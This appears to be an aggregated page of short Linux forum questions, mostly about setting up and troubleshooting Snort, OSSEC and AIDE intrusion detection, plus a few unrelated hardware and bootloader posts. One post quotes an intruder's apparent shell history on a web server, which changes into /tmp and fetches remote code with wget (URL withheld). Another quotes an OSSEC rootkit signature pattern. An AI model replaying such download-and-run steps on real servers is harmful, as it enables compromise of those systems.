Trying to figure out which Intrusion Detection System would be best for me. I've got a CentOs 5 / Linux / Apache system. If you've got experience with either (or both ) , please let me know your thoughts. I'm looking for the one thats not as technical, And a bit more user friendly I guess.
View 4 RepliesMy desktop (the system AIDE runs on) is reguarly updated, and the file output can become enormous, making it hard, if not impossible, to track down out of place files. I have recently thought of uninstalling it since I can't tell what is out of place and what isn't, but before I do that I wanted to ask everyones opinion regarding what would be the best way to handle such a program on a desktop that has some core files changed reguarly. This sytem is running Gentoo, so updates affect a number of directories.
View 6 Replies View Relatedsoftware to use against Intrusion and such. The thing is that I don't want to have several anti virus programs running at the same time due to collision.
View 9 Replies View Relateddoes anyone know of a good tutorial on how to set up and configure snort 2.8.5.2 on a ubuntu 10.10 system.I have been trying to set up snort and have run into alot of problems setting up the config file and the rules. It works in sniff and packet log mode but i cannot seem to set up IDS mode correctly. There is alot of different info on the net but not much help. There seems to be alot of work involved in setting this up which i do not mind provided i can find the proper documentation to configure the set up.
View 9 Replies View RelatedI need assistance with my Snort Installation. I used Bodhi Zazen's Network Intrusion Detection System post and found it easier than the previous time I had done it. I am currently running Ubuntu 10.04 server and Snort 2.8.6.1 with BASE 1.4.5. I followed Bodhi Zazen's instructions and when I tested snort it ended with a Fatal Error due to ERROR: /etc/snort/rules/exploit.rules(264) => 'fast_pattern' does not take an argument
Fatal Error, Quitting.. Here is the entire output once I ran the test command: snort -c /etc/snort/snort.con -T Running in Test mode
[Code]...
Recently I had a Java exploit on Windows. Luckily Microsoft Security Essentials identified and removed it. Such things can happen on Linux as well, from what I've heard. Why does Linux offer no such detection?
View 14 Replies View RelatedI recently upgrade my system from Jessie to Stretch, with no problem. A little later I upgrades Enlightenment from e17 to e20, and at some point shortly after that the second screen stopped working.
The nvidia X Server Settings correctly identifies both screens. But Enlightenment and xrandr does not see the second one at all. The second screen are on and the pointer moves correctly onto it, but no activity with left or right click. I have tried with the original xorg.conf, and generated a new one with nvidia-xconfig, but no difference. No obvious errors in any log-files either.
lisa@kitten:~$ sudo uname -a
Linux kitten 4.3.0-1-amd64 #1 SMP Debian 4.3.3-2 (2015-12-17) x86_64 GNU/Linux
Can ossec be run from ubuntu with less notifications to mail only intrusions. i really dont wish to be notified of every single thing that goes on in my system. i only want to be notified of intrusions and anything else that would be of serious concern. can anyone tell me what setting i can do to achieve the goal in mind ?
View 3 Replies View Relatedi have installed ubuntu on vmware and just finished networking part after some trouble.now i need to install the osses hids the most recent release.i need to know what are all the prerequisites and the procedure,i am very much new to the ubuntu or anyother linux based platform,
View 1 Replies View RelatedOSSEC is detecting a trojaned version of /bin/login on a Lucid clean install.[FAILED]: Trojaned version of file '/bin/login' detected. Signature used:bash|elite|SucKIT|xlogin|vejeta|porcao|lets_log|s ukasuk' (Generic).
I am striving to setup OSSEC to monitor some specific files for realtime changes! Is this possible? I can't really find a lot of info from their Documentation
Some Examples:
/etc/myfile.txt is deleted. I need this to be reported.
/etc/myfile.txt is created again so I need this to be reported again!
This has to happen instantly though, because the file might be deleted and created again many times in a short period of time.. Another one...
/etc/passwd is touched (accessed) even if there is no changes! Can this be reported as well?
i have installed Ossec and save it on my sql database but the timestamp of alert is not human readable, how to make it readable ? is there algorithm to make it readable?
View 1 Replies View RelatedIs an ubuntu live cd totally secure from intrusion? Stated another way, even if someone knows my ip address, can the live cd environment be hacked into in any way so that another could monitor what I am doing on my computer? From my understanding the live cd is read only, so that would prevent anything malicious being installed on it. I am curious if there are other ways a box running a live cd could be tapped into.
View 6 Replies View RelatedHow to detect intrusion in my desktop ubunta 9.10 version ? which command that could direct tell me about any change in my files ? I would like the procedures that protect my system from intrusion , i am using firestarter and keep tracing the network by using netsta -tap ?
View 2 Replies View RelatedI've just installed the new Fedora 11 (just released) through a Live CD having 3 partitions created:
"/boot" - ext3,
"/" - lvm (part 1)
swap - lvm (part 2)
now, I want to add my new Fedora system entry to my "central" lilo.conf, resident on another linux distribution. So, i've done
[Code]...
my lilo fedora entry boots fine but... at the middle of "after boot" loading the system hangs and stops the usual driver detection, etc (normally, it hangs on the CDROM detection or USB 2.0 camera detection).
I'M A NOVICE and some days ago my web server was down (apache issue) and I found the following file called .bash_history in the folder /var/www/ :
cd /tmp
ls
wget [MODERATED]
[code]...
the following security alert made me checking my httpd.conf:
Code:
Summary:
SELinux is preventing the http daemon from reading users' home directories. Detailed Description: SELinux has denied the http daemon access to users' home directories. Someone is attempting to access your home directories via your http daemon. If you have not setup httpd to share home directories, this probably signals an intrusion attempt. Even though in httpd.conf there is a line that reads
Code:
LoadModule userdir_module modules/mod_userdir.so
in the same conf-file the access to home-dirs is disabled:
Code:
<IfModule mod_userdir.c>
[Code]....
I am running Debian 5 and I'm trying to install and configure SNORT. My first stop is to Snort.org where I check out the directions. They tell me I need Libpcap, PCRE, Libnet and Barnyard. I've looked at the Debian Snort installation guide, and I've noticed that most the documents are really old...
I've actually got libpcap and PCRE installed and now I'm trying to figure out how to get libnet installed. It seems more tricky. I think it's the oldest api I've seen.
I guess my main area of question is if there is a better way of getting Snort up and running... I had a previous version of Linux where I install just Snort and I had network packets streaming across the screen, but that's not very helpful as I need some kind of interface so I know what the hell im looking at.
So should I follow the instructions on Snort.org as well as the "Debian, Snort, Barnyard, BASE, & Oinkmaster Setup Guide"? Or does anyone know a more up-to-date guide for Debian users?
want to set up snort on my F13 home computer.Is there a simple way to do it or do I have to do it the hard way (compiling and stuff) ?I want to use snort for intrusion prevention and detect possible threats from internet.
View 3 Replies View RelatedHow can I install snort in Ubuntu 10.10 and how can I use it?
View 1 Replies View RelatedI am currently running snort as an IDS on the same machine that acts as our gateway. I installed it using sudo apt-get install snort. However, I'd like to make it run as an IPS. Is it possible to convert that currently running snort instance from running as an IDS to an IPS without having to download the snort tar balls and install it? I do not want the tar balls because during updates and upgrades, I'd like the whole OS and installed apps (such as snort) to be upgraded.
View 1 Replies View RelatedI normally install programs with yum but I have to download barnyard as a requisite for snort to detect instrusion attempts.I downloaded barnyard and ran ./configure, make, make install, etc.Where does the program get installed? I was running this as root so does it install it into /root/barnyard?
View 5 Replies View RelatedI'm using on my PC the firewall NuFW and SNORT. Snort send alerts when he detects a pornographic website. I would like that NuFW create an ACL to drop this IP. Can SNORT do this or must i do a program wich listen the Snort's port to catch the ip and write it in the ACL file of NuFW?
View 3 Replies View RelatedHow to enable ipv6 in snort. I read that it must compilate with --enable-ipv6 but still don't know how?
View 2 Replies View RelatedCode:
test@denial:~# ps -e | grep snort
18470 ? 00:00:00 snort
how do i disable snort daemon at start up? i only want it to be running when i want it to be running.
I work in a relatively small organisation of about 30 people (but with a complex network) and we've been looking to move our firewall to Microsoft's Threat Protection Manager on a mostly Windows network. I've been thinking we should have an IDS/IPS inside the firewall and I've been thinking about Snort in NIDS mode but have some basic questions:
1. Can anyone recommend a good web GUI for Snort?
2. Is it advisable to run both on the same machine? (Both from a POV of security and resources.)
3. Would Snort add any real benifit to using TPM?
When i setup snort default listen on eth0, now i want change to eth1 set default listen interface.
View 11 Replies View RelatedI am trying to install snort on debian linux. The following error appears ERROR! Libpcre library not found. Get it from [URL].. I have installed the Libpcre3-dev library but the error is still on.What could I be doing wrong?
View 5 Replies View RelatedAccording to tutorial for installing snort in CentOS, downloaded from CentOS or snort site, I installed snort using:
Code:
./configure -with-mysql-libraries=/usr/lib64/mysql/ --enable-dynamicplugin --enable-ipv6 --enable-zlib
make
make install
[Code].....
I am trying to get snort running but I get this with service snortd status:
snort dead but subsys locked
service snortd restart
Stopping snort: [FAILED]
Starting snort: [ OK ]
[root@Fedora tylerm]# tail -f /var/log/messages
Mar 4 05:17:54 Fedora kernel: device eth0 entered promiscuous mode
Mar 4 05:17:54 Fedora kernel: device eth0 left promiscuous mode
Mar 4 05:17:54 Fedora snort[3280]: Initializing daemon mode
Mar 4 05:17:54 Fedora kernel: device eth0 entered promiscuous mode
Mar 4 05:17:54 Fedora snort[3282]: PID path stat checked out ok, PID path set to /var/run/
Mar 4 05:17:54 Fedora snort[3282]: Writing PID "3282" to file "/var/run//snort_eth0.pid"
Mar 4 05:17:54 Fedora snort[3282]: Daemon initialized, signaled parent pid: 3280
Mar 4 05:17:54 Fedora snort[3280]: Daemon parent exiting
Mar 4 05:17:54 Fedora snort[3282]: FATAL ERROR: OpenAlertFile() => fopen() alert file /var/log/snort/alert: Permission denied
Mar 4 05:17:54 Fedora kernel: device eth0 left promiscuous mode
Mar 4 05:18:42 Fedora ntpd[2300]: synchronized to 128.10.19.24, stratum 1
Mar 4 05:18:42 Fedora ntpd[2300]: time reset +0.906114 s
Mar 4 05:18:42 Fedora ntpd[2300]: kernel time sync status change 0001